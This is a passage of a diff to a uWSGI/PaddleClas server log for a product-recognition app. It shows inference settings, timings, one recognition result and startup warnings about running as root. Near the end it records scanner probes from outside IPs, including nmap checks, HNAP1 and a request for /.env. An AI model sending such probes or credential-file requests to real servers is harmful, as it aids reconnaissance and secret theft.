6275 msecs (HTTP/1.1 200) 5 headers in 157 bytes (12 switches on core 0) -req -2021-11-03 03:49:17 INFO: +[pid: 12457|app: 0|req: 1/15] 49.79.96.123 () {36 vars in 810 bytes} [Wed Jan 26 16:38:36 2022] POST /reference/ => generated 98 bytes in 3135 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) +2022-01-26 16:38:58 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle ! 
== =========================================================== @@ -1561,75 +993,58 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 03:49:17 INFO: DetPostProcess : -2021-11-03 03:49:17 INFO: DetPreProcess : -2021-11-03 03:49:17 INFO: transform_ops : -2021-11-03 03:49:17 INFO: DetResize : -2021-11-03 03:49:17 INFO: interp : 2 -2021-11-03 03:49:17 INFO: keep_ratio : False -2021-11-03 03:49:17 INFO: target_size : [640, 640] -2021-11-03 03:49:17 INFO: DetNormalizeImage : -2021-11-03 03:49:17 INFO: is_scale : True -2021-11-03 03:49:17 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 03:49:17 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 03:49:17 INFO: DetPermute : -2021-11-03 03:49:17 INFO: Global : -2021-11-03 03:49:17 INFO: batch_size : 1 -2021-11-03 03:49:17 INFO: cpu_num_threads : 10 -2021-11-03 03:49:17 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 03:49:17 INFO: enable_benchmark : True -2021-11-03 03:49:17 INFO: enable_mkldnn : True -2021-11-03 03:49:17 INFO: enable_profile : False -2021-11-03 03:49:17 INFO: gpu_mem : 8000 -2021-11-03 03:49:17 INFO: image_shape : [3, 640, 640] -2021-11-03 03:49:17 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 03:49:17 INFO: ir_optim : True -2021-11-03 03:49:17 INFO: labe_list : ['foreground'] -2021-11-03 03:49:17 INFO: max_det_results : 5 -2021-11-03 03:49:17 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 03:49:17 INFO: rec_nms_thresold : 0.05 -2021-11-03 03:49:17 INFO: threshold : 0.2 -2021-11-03 03:49:17 INFO: use_fp16 : False -2021-11-03 03:49:17 INFO: use_gpu : False -2021-11-03 03:49:17 INFO: use_tensorrt : False -2021-11-03 03:49:17 INFO: IndexProcess : -2021-11-03 03:49:17 INFO: index_dir : 
/root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 03:49:17 INFO: return_k : 5 -2021-11-03 03:49:17 INFO: score_thres : 0.5 -2021-11-03 03:49:17 INFO: RecPostProcess : None -2021-11-03 03:49:17 INFO: RecPreProcess : -2021-11-03 03:49:17 INFO: transform_ops : -2021-11-03 03:49:17 INFO: ResizeImage : -2021-11-03 03:49:17 INFO: size : 224 -2021-11-03 03:49:17 INFO: NormalizeImage : -2021-11-03 03:49:17 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 03:49:17 INFO: order : -2021-11-03 03:49:17 INFO: scale : 0.00392157 -2021-11-03 03:49:17 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 03:49:17 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. 
---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2494.0578937530518 ms per batch image +2022-01-26 16:38:58 INFO: DetPostProcess : +2022-01-26 16:38:58 INFO: DetPreProcess : +2022-01-26 16:38:58 INFO: transform_ops : +2022-01-26 16:38:58 INFO: DetResize : +2022-01-26 16:38:58 INFO: interp : 2 +2022-01-26 16:38:58 INFO: keep_ratio : False +2022-01-26 16:38:58 INFO: target_size : [640, 640] +2022-01-26 16:38:58 INFO: DetNormalizeImage : +2022-01-26 16:38:58 INFO: is_scale : True +2022-01-26 16:38:58 INFO: mean : [0.485, 0.456, 0.406] +2022-01-26 16:38:58 INFO: std : [0.229, 0.224, 0.225] +2022-01-26 16:38:58 INFO: DetPermute : +2022-01-26 16:38:58 INFO: Global : +2022-01-26 16:38:58 INFO: batch_size : 1 +2022-01-26 16:38:58 INFO: cpu_num_threads : 1 +2022-01-26 16:38:58 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-01-26 16:38:58 INFO: enable_benchmark : True +2022-01-26 16:38:58 INFO: enable_mkldnn : True +2022-01-26 16:38:58 INFO: enable_profile : False +2022-01-26 16:38:58 INFO: gpu_mem : 8000 +2022-01-26 16:38:58 INFO: image_shape : [3, 640, 640] +2022-01-26 16:38:58 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/retail/test1.jpg +2022-01-26 16:38:58 INFO: ir_optim : True +2022-01-26 16:38:58 INFO: labe_list : ['foreground'] +2022-01-26 16:38:58 INFO: max_det_results : 5 +2022-01-26 16:38:58 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-26 16:38:58 INFO: rec_nms_thresold : 0.05 +2022-01-26 16:38:58 INFO: threshold : 
0.2 +2022-01-26 16:38:58 INFO: use_fp16 : False +2022-01-26 16:38:58 INFO: use_gpu : False +2022-01-26 16:38:58 INFO: use_tensorrt : False +2022-01-26 16:38:58 INFO: IndexProcess : +2022-01-26 16:38:58 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-26 16:38:58 INFO: return_k : 5 +2022-01-26 16:38:58 INFO: score_thres : 0.5 +2022-01-26 16:38:58 INFO: RecPostProcess : None +2022-01-26 16:38:58 INFO: RecPreProcess : +2022-01-26 16:38:58 INFO: transform_ops : +2022-01-26 16:38:58 INFO: ResizeImage : +2022-01-26 16:38:58 INFO: size : 224 +2022-01-26 16:38:58 INFO: NormalizeImage : +2022-01-26 16:38:58 INFO: mean : [0.485, 0.456, 0.406] +2022-01-26 16:38:58 INFO: order : +2022-01-26 16:38:58 INFO: scale : 0.00392157 +2022-01-26 16:38:58 INFO: std : [0.229, 0.224, 0.225] +2022-01-26 16:38:58 INFO: ToCHWImage : None +Inference: 377.3174285888672 ms per batch image [] 234 ["Please connect root to upload container's name and it's price!\n"] -[pid: 32766|app: 0|req: 3/7] 210.51.42.176 () {34 vars in 432 bytes} [Wed Nov 3 03:49:16 2021] POST /reference_client/ => generated 98 bytes in 6748 msecs (HTTP/1.1 200) 5 headers in 157 bytes (9 switches on core 0) -req -2021-11-03 03:50:09 INFO: +[pid: 12459|app: 0|req: 14/16] 49.79.96.123 () {36 vars in 810 bytes} [Wed Jan 26 16:38:57 2022] POST /reference/ => generated 98 bytes in 3023 msecs (HTTP/1.1 200) 5 headers in 157 bytes (33 switches on core 0) +2022-01-26 16:39:11 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle ! 
== =========================================================== @@ -1639,76 +1054,107 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 03:50:09 INFO: DetPostProcess : -2021-11-03 03:50:09 INFO: DetPreProcess : -2021-11-03 03:50:09 INFO: transform_ops : -2021-11-03 03:50:09 INFO: DetResize : -2021-11-03 03:50:09 INFO: interp : 2 -2021-11-03 03:50:09 INFO: keep_ratio : False -2021-11-03 03:50:09 INFO: target_size : [640, 640] -2021-11-03 03:50:09 INFO: DetNormalizeImage : -2021-11-03 03:50:09 INFO: is_scale : True -2021-11-03 03:50:09 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 03:50:09 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 03:50:09 INFO: DetPermute : -2021-11-03 03:50:09 INFO: Global : -2021-11-03 03:50:09 INFO: batch_size : 1 -2021-11-03 03:50:09 INFO: cpu_num_threads : 10 -2021-11-03 03:50:09 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 03:50:09 INFO: enable_benchmark : True -2021-11-03 03:50:09 INFO: enable_mkldnn : True -2021-11-03 03:50:09 INFO: enable_profile : False -2021-11-03 03:50:09 INFO: gpu_mem : 8000 -2021-11-03 03:50:09 INFO: image_shape : [3, 640, 640] -2021-11-03 03:50:09 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 03:50:09 INFO: ir_optim : True -2021-11-03 03:50:09 INFO: labe_list : ['foreground'] -2021-11-03 03:50:09 INFO: max_det_results : 5 -2021-11-03 03:50:09 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 03:50:09 INFO: rec_nms_thresold : 0.05 -2021-11-03 03:50:09 INFO: threshold : 0.2 -2021-11-03 03:50:09 INFO: use_fp16 : False -2021-11-03 03:50:09 INFO: use_gpu : False -2021-11-03 03:50:09 INFO: use_tensorrt : False -2021-11-03 03:50:09 INFO: IndexProcess : -2021-11-03 03:50:09 INFO: index_dir : 
/root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 03:50:09 INFO: return_k : 5 -2021-11-03 03:50:09 INFO: score_thres : 0.5 -2021-11-03 03:50:09 INFO: RecPostProcess : None -2021-11-03 03:50:09 INFO: RecPreProcess : -2021-11-03 03:50:09 INFO: transform_ops : -2021-11-03 03:50:09 INFO: ResizeImage : -2021-11-03 03:50:09 INFO: size : 224 -2021-11-03 03:50:09 INFO: NormalizeImage : -2021-11-03 03:50:09 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 03:50:09 INFO: order : -2021-11-03 03:50:09 INFO: scale : 0.00392157 -2021-11-03 03:50:09 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 03:50:09 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. 
---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2230.3977012634277 ms per batch image +2022-01-26 16:39:11 INFO: DetPostProcess : +2022-01-26 16:39:11 INFO: DetPreProcess : +2022-01-26 16:39:11 INFO: transform_ops : +2022-01-26 16:39:11 INFO: DetResize : +2022-01-26 16:39:11 INFO: interp : 2 +2022-01-26 16:39:11 INFO: keep_ratio : False +2022-01-26 16:39:11 INFO: target_size : [640, 640] +2022-01-26 16:39:11 INFO: DetNormalizeImage : +2022-01-26 16:39:11 INFO: is_scale : True +2022-01-26 16:39:11 INFO: mean : [0.485, 0.456, 0.406] +2022-01-26 16:39:11 INFO: std : [0.229, 0.224, 0.225] +2022-01-26 16:39:11 INFO: DetPermute : +2022-01-26 16:39:11 INFO: Global : +2022-01-26 16:39:11 INFO: batch_size : 1 +2022-01-26 16:39:11 INFO: cpu_num_threads : 1 +2022-01-26 16:39:11 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-01-26 16:39:11 INFO: enable_benchmark : True +2022-01-26 16:39:11 INFO: enable_mkldnn : True +2022-01-26 16:39:11 INFO: enable_profile : False +2022-01-26 16:39:11 INFO: gpu_mem : 8000 +2022-01-26 16:39:11 INFO: image_shape : [3, 640, 640] +2022-01-26 16:39:11 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/retail/test1.jpg +2022-01-26 16:39:11 INFO: ir_optim : True +2022-01-26 16:39:11 INFO: labe_list : ['foreground'] +2022-01-26 16:39:11 INFO: max_det_results : 5 +2022-01-26 16:39:11 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-26 16:39:11 INFO: rec_nms_thresold : 0.05 +2022-01-26 16:39:11 INFO: threshold : 
0.2 +2022-01-26 16:39:11 INFO: use_fp16 : False +2022-01-26 16:39:11 INFO: use_gpu : False +2022-01-26 16:39:11 INFO: use_tensorrt : False +2022-01-26 16:39:11 INFO: IndexProcess : +2022-01-26 16:39:11 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-26 16:39:11 INFO: return_k : 5 +2022-01-26 16:39:11 INFO: score_thres : 0.5 +2022-01-26 16:39:11 INFO: RecPostProcess : None +2022-01-26 16:39:11 INFO: RecPreProcess : +2022-01-26 16:39:11 INFO: transform_ops : +2022-01-26 16:39:11 INFO: ResizeImage : +2022-01-26 16:39:11 INFO: size : 224 +2022-01-26 16:39:11 INFO: NormalizeImage : +2022-01-26 16:39:11 INFO: mean : [0.485, 0.456, 0.406] +2022-01-26 16:39:11 INFO: order : +2022-01-26 16:39:11 INFO: scale : 0.00392157 +2022-01-26 16:39:11 INFO: std : [0.229, 0.224, 0.225] +2022-01-26 16:39:11 INFO: ToCHWImage : None +Inference: 375.63490867614746 ms per batch image [] 234 ["Please connect root to upload container's name and it's price!\n"] -[pid: 32765|app: 0|req: 4/8] 210.51.42.176 () {34 vars in 432 bytes} [Wed Nov 3 03:50:08 2021] POST /reference_client/ => generated 98 bytes in 5760 msecs (HTTP/1.1 200) 5 headers in 157 bytes (9 switches on core 0) -[pid: 32766|app: 0|req: 4/9] 83.97.20.34 () {26 vars in 269 bytes} [Wed Nov 3 03:50:46 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) -req -2021-11-03 03:54:47 INFO: +[pid: 12458|app: 0|req: 2/17] 49.79.96.123 () {36 vars in 809 bytes} [Wed Jan 26 16:39:10 2022] POST /reference/ => generated 98 bytes in 2911 msecs (HTTP/1.1 200) 5 headers in 157 bytes (15 switches on core 0) +*** Starting uWSGI 2.0.20 (64bit) on [Thu Jan 27 01:52:43 2022] *** +compiled with version: 7.5.0 on 26 January 2022 07:48:28 +os: Linux-4.15.0-166-generic #174-Ubuntu SMP Wed Dec 8 19:07:44 UTC 2021 +nodename: iZuf6i5vgnr6fuc47aapjkZ +machine: x86_64 +clock source: unix +detected number of CPU cores: 2 +current working directory: 
/root/Smart_container/conf/uwsgi +writing pidfile to /root/Smart_container/conf/uwsgi/uwsgi.pid +detected binary path: /usr/local/bin/uwsgi +!!! no internal routing support, rebuild with pcre support !!! +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +chdir() to /root/Smart_container +your processes number limit is 15592 +your memory page size is 4096 bytes +detected max file descriptor number: 65535 +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +uWSGI http bound on :8001 fd 6 +uwsgi socket 0 bound to TCP address 127.0.0.1:8000 fd 9 +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +Python version: 3.6.9 (default, Dec 8 2021, 21:08:43) [GCC 8.4.0] +*** Python threads support is disabled. You can enable it with --enable-threads *** +Python main interpreter initialized at 0x5607c50fd830 +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +your server socket listen backlog is limited to 100 connections +your mercy for graceful operations on workers is 60 seconds +mapped 801944 bytes (783 KB) for 10 cores +*** Operational MODE: preforking *** +WSGI app 0 (mountpoint='') ready in 1 seconds on interpreter 0x5607c50fd830 pid: 13118 (default app) +mountpoint already configured. skip. +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! 
(use the --uid flag) *** +*** uWSGI is running in multiple interpreter mode *** +spawned uWSGI master process (pid: 13118) +spawned uWSGI worker 1 (pid: 13120, cores: 1) +spawned uWSGI worker 2 (pid: 13121, cores: 1) +spawned uWSGI worker 3 (pid: 13122, cores: 1) +spawned uWSGI worker 4 (pid: 13123, cores: 1) +spawned uWSGI worker 5 (pid: 13124, cores: 1) +spawned uWSGI worker 6 (pid: 13125, cores: 1) +spawned uWSGI worker 7 (pid: 13126, cores: 1) +spawned uWSGI worker 8 (pid: 13127, cores: 1) +spawned uWSGI worker 9 (pid: 13128, cores: 1) +spawned uWSGI worker 10 (pid: 13129, cores: 1) +spawned uWSGI http 1 (pid: 13130) +2022-01-26 17:53:28 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle ! == =========================================================== @@ -1718,75 +1164,899 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 03:54:47 INFO: DetPostProcess : -2021-11-03 03:54:47 INFO: DetPreProcess : -2021-11-03 03:54:47 INFO: transform_ops : -2021-11-03 03:54:47 INFO: DetResize : -2021-11-03 03:54:47 INFO: interp : 2 -2021-11-03 03:54:47 INFO: keep_ratio : False -2021-11-03 03:54:47 INFO: target_size : [640, 640] -2021-11-03 03:54:47 INFO: DetNormalizeImage : -2021-11-03 03:54:47 INFO: is_scale : True -2021-11-03 03:54:47 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 03:54:47 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 03:54:47 INFO: DetPermute : -2021-11-03 03:54:47 INFO: Global : -2021-11-03 03:54:47 INFO: batch_size : 1 -2021-11-03 03:54:47 INFO: cpu_num_threads : 10 -2021-11-03 03:54:47 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 03:54:47 INFO: enable_benchmark : True -2021-11-03 03:54:47 INFO: enable_mkldnn : True -2021-11-03 03:54:47 INFO: enable_profile : False -2021-11-03 03:54:47 INFO: gpu_mem : 8000 -2021-11-03 03:54:47 INFO: 
image_shape : [3, 640, 640] -2021-11-03 03:54:47 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 03:54:47 INFO: ir_optim : True -2021-11-03 03:54:47 INFO: labe_list : ['foreground'] -2021-11-03 03:54:47 INFO: max_det_results : 5 -2021-11-03 03:54:47 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 03:54:47 INFO: rec_nms_thresold : 0.05 -2021-11-03 03:54:47 INFO: threshold : 0.2 -2021-11-03 03:54:47 INFO: use_fp16 : False -2021-11-03 03:54:47 INFO: use_gpu : False -2021-11-03 03:54:47 INFO: use_tensorrt : False -2021-11-03 03:54:47 INFO: IndexProcess : -2021-11-03 03:54:47 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 03:54:47 INFO: return_k : 5 -2021-11-03 03:54:47 INFO: score_thres : 0.5 -2021-11-03 03:54:47 INFO: RecPostProcess : None -2021-11-03 03:54:47 INFO: RecPreProcess : -2021-11-03 03:54:47 INFO: transform_ops : -2021-11-03 03:54:47 INFO: ResizeImage : -2021-11-03 03:54:47 INFO: size : 224 -2021-11-03 03:54:47 INFO: NormalizeImage : -2021-11-03 03:54:47 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 03:54:47 INFO: order : -2021-11-03 03:54:47 INFO: scale : 0.00392157 -2021-11-03 03:54:47 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 03:54:47 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. 
---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2342.794895172119 ms per batch image +2022-01-26 17:53:28 INFO: DetPostProcess : +2022-01-26 17:53:28 INFO: DetPreProcess : +2022-01-26 17:53:28 INFO: transform_ops : +2022-01-26 17:53:28 INFO: DetResize : +2022-01-26 17:53:28 INFO: interp : 2 +2022-01-26 17:53:28 INFO: keep_ratio : False +2022-01-26 17:53:28 INFO: target_size : [640, 640] +2022-01-26 17:53:28 INFO: DetNormalizeImage : +2022-01-26 17:53:28 INFO: is_scale : True +2022-01-26 17:53:28 INFO: mean : [0.485, 0.456, 0.406] +2022-01-26 17:53:28 INFO: std : [0.229, 0.224, 0.225] +2022-01-26 17:53:28 INFO: DetPermute : +2022-01-26 17:53:28 INFO: Global : +2022-01-26 17:53:28 INFO: batch_size : 1 +2022-01-26 17:53:28 INFO: cpu_num_threads : 1 +2022-01-26 17:53:28 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-01-26 17:53:28 INFO: enable_benchmark : True +2022-01-26 17:53:28 INFO: enable_mkldnn : True +2022-01-26 17:53:28 INFO: enable_profile : False +2022-01-26 17:53:28 INFO: gpu_mem : 8000 +2022-01-26 17:53:28 INFO: image_shape : [3, 640, 640] +2022-01-26 17:53:28 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/retail/test1.jpg +2022-01-26 17:53:28 INFO: ir_optim : True +2022-01-26 17:53:28 INFO: labe_list : ['foreground'] +2022-01-26 17:53:28 INFO: max_det_results : 5 +2022-01-26 17:53:28 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-01-26 17:53:28 INFO: rec_nms_thresold : 0.05 +2022-01-26 17:53:28 INFO: threshold : 
0.2 +2022-01-26 17:53:28 INFO: use_fp16 : False +2022-01-26 17:53:28 INFO: use_gpu : False +2022-01-26 17:53:28 INFO: use_tensorrt : False +2022-01-26 17:53:28 INFO: IndexProcess : +2022-01-26 17:53:28 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-01-26 17:53:28 INFO: return_k : 5 +2022-01-26 17:53:28 INFO: score_thres : 0.5 +2022-01-26 17:53:28 INFO: RecPostProcess : None +2022-01-26 17:53:28 INFO: RecPreProcess : +2022-01-26 17:53:28 INFO: transform_ops : +2022-01-26 17:53:28 INFO: ResizeImage : +2022-01-26 17:53:28 INFO: size : 224 +2022-01-26 17:53:28 INFO: NormalizeImage : +2022-01-26 17:53:28 INFO: mean : [0.485, 0.456, 0.406] +2022-01-26 17:53:28 INFO: order : +2022-01-26 17:53:28 INFO: scale : 0.00392157 +2022-01-26 17:53:28 INFO: std : [0.229, 0.224, 0.225] +2022-01-26 17:53:28 INFO: ToCHWImage : None +Inference: 379.5459270477295 ms per batch image +[{'bbox': [0, 0, 733, 1440], 'rec_docs': 'kindle电子书阅读器', 'rec_scores': 0.84588814}] +{'bbox': [0, 0, 733, 1440], 'rec_docs': 'kindle电子书阅读器', 'rec_scores': 0.84588814} +234 +["{'bbox': [0, 0, 733, 1440], 'rec_docs': 'kindle电子书阅读器', 'rec_scores': 0.84588814}\n"] +['kindle电子书阅读器'] +['kindle电子书阅读器', '639'] +[pid: 13129|app: 0|req: 1/1] 49.79.96.123 () {36 vars in 810 bytes} [Wed Jan 26 17:53:27 2022] POST /reference/ => generated 134 bytes in 3225 msecs (HTTP/1.1 200) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 2/2] 111.7.96.151 () {32 vars in 357 bytes} [Wed Jan 26 18:11:35 2022] GET / => generated 179 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 3/3] 36.99.136.128 () {46 vars in 791 bytes} [Wed Jan 26 18:11:45 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 4/4] 36.99.136.128 () {46 vars in 813 bytes} [Wed Jan 26 18:11:45 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 
158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 5/5] 2.57.122.9 () {30 vars in 436 bytes} [Wed Jan 26 18:19:37 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 6/6] 2.57.122.9 () {30 vars in 458 bytes} [Wed Jan 26 18:19:37 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 7/7] 2.57.122.9 () {34 vars in 474 bytes} [Wed Jan 26 18:19:38 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 8/8] 2.57.122.9 () {34 vars in 496 bytes} [Wed Jan 26 18:19:38 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13128|app: 0|req: 1/9] 106.75.84.37 () {26 vars in 282 bytes} [Wed Jan 26 18:28:48 2022] GET / => generated 179 bytes in 237 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 9/10] 120.52.152.20 () {34 vars in 572 bytes} [Wed Jan 26 18:29:30 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 10/11] 209.17.96.50 () {30 vars in 409 bytes} [Wed Jan 26 19:39:52 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 11/12] 2.57.121.59 () {34 vars in 400 bytes} [Wed Jan 26 20:05:46 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 12/13] 62.171.132.199 () {40 vars in 672 bytes} [Wed Jan 26 20:08:27 2022] GET /config/getuser?index=0 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 13/14] 39.103.164.38 () {32 vars in 513 bytes} [Wed Jan 26 20:11:18 2022] GET /nmaplowercheck1643227868 => generated 179 
bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 14/15] 39.103.164.38 () {32 vars in 485 bytes} [Wed Jan 26 20:11:18 2022] GET /evox/about => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 15/16] 39.103.164.38 () {32 vars in 475 bytes} [Wed Jan 26 20:11:18 2022] GET /HNAP1 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 16/17] 39.103.164.38 () {34 vars in 501 bytes} [Wed Jan 26 20:11:20 2022] POST /sdk => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 17/18] 39.103.164.38 () {28 vars in 307 bytes} [Wed Jan 26 20:11:40 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 18/19] 83.97.20.34 () {30 vars in 329 bytes} [Wed Jan 26 20:12:01 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 19/20] 18.144.28.7 () {36 vars in 587 bytes} [Wed Jan 26 20:44:34 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 13129|app: 0|req: 20/21] 18.144.28.7 () {40 vars in 694 bytes} [Wed Jan 26 20:44:34 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 